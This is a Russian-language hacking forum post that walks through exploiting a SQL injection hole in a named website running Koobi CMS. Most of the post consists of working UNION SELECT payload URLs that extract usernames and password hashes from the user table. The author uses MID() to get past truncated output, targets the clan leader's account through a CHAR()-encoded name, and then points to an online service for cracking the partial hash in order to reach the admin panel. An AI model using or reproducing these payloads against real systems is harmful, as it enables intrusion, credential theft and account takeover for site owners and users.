2 diznt, 2 gisTy, 2 sabe
По поводу сайта http://darkbrotherhood.ru
ЦМС koobi.
Версия мускула 4.1.22 (ну и ясно что никакой информатион_схемы нету)
Дырок хватает. Все что я нашел вели только к посимвольному бруту, кроме одной и вот она интересна раскруткой.
Дыра в форуме вот тут
http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,11,version() ,13/*
Вроде все нормально, но...
Качаем koobi смотрим таблицы, и колонки (я скачал немного не ту версию, но догадался с префиксом)
Запрос
http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,uname,pass,1 3+from+k_user/*
выдет странную картину - имена и пароли (хеши) видны не полностью.
Юзаем функции работы со строками в мускуле, я взял MID()
Запрос
http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,MID(email,1, 8),MID(pass,1,8),13+from+k_user/*
выдал то что нужно

Восьмерку тут MID(pass,1,8) подобираем опытным путем (интересно почему там 8 )
Дальше думаю понятно, меняем 1 так что бы увидеть всю строку целиком.
НО, хеш можно получать и не весь, вполне хватит первых восьми символов, с ними идем сюда http://hashcracking.info ,
выбираем поиск по маске и получаем пасс

У этой ЦМС в админке бывает авторизация по мылу, но тут по логину юзера. Его находим вот тут (на случай логина больше 8 символов)
http://darkbrotherhood.ru/index.php?area=1&p=static&page=sostav (Глава клана)
Поэтому последний запрос вот такой
http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,MID(uname,1, 8),MID(pass,1,8),13+from+k_user+where+uname=CHAR(6 8,97,114,107,101,108,118,101)/*
...
Было интересно исследовать. Может кто найдет другой путь?